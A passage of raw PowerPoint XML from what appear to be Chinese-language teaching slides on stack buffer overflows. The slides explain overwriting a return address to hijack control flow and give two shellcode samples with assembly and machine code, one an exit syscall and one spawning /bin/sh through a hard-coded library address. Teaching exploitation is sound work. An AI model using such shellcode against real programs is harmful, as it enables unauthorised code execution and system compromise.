              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>溢出，来控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指针，从而来执行我们想实现的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>流程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>： （逆向）执行我们想要的代码  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&lt; ---ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>返回值，返回到目标地址  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&lt; --- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>填满缓冲区，让目标地址正好覆盖返回地址  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&lt; --- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>生成若干字符，确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>大小 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&lt; ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>开始地址和偏移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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842376" y="5026026"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表格 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1979200" y="3300526"/>
          <a:ext cx="2000221" cy="914400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2000221"/>
              </a:tblGrid>
              <a:tr h="902624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="A9A9B3"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0x01</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="7E848F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="A9A9B3"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>66</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="7E848F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0x80</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="7E848F"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" i="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="7E848F"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1062355" y="4347845"/>
          <a:ext cx="3975100" cy="335280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3975100"/>
              </a:tblGrid>
              <a:tr h="211692">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bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>机器码：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>b801000000bb42000000cd80</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 11"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6117590" y="3300730"/>
          <a:ext cx="2267585" cy="2042160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2267585"/>
              </a:tblGrid>
              <a:tr h="1942051">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err="1">
                          <a:solidFill>
                            <a:srgbClr val="41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="A9A9B3"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="19B9C4"/>
                        </a:solidFill>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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>push</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>push</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0x68732f2f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>push</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0x6e69622f</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="A9A9B3"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>push</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>edi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="A9A9B3"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="DB985C"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0xf7e2cb30</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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41B0F5"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>call</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="19B9C4"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>edi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="14" name="表格 13"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8452326" y="3300956"/>
          <a:ext cx="3133090" cy="1513840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3133090"/>
              </a:tblGrid>
              <a:tr h="1513840">
                <a:tc>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bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>机器码：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>31c050682f2f7368682f6689e050bb30bbe2f7ffd3"</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4817745" y="3300730"/>
            <a:ext cx="1238885"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pc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E5BF78"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="150" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E5BF78"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E5BF78"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177925" y="925830"/>
            <a:ext cx="10175875" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9B3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最简单的办法就是把想执行的代码用机器码表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即俗称的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将其写入程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后将返回地址修改为该段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的起始地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197610" y="2467610"/>
            <a:ext cx="10156190" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>准备了如下两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174561" y="3591646"/>
            <a:ext cx="4943475" cy="2247900"/>
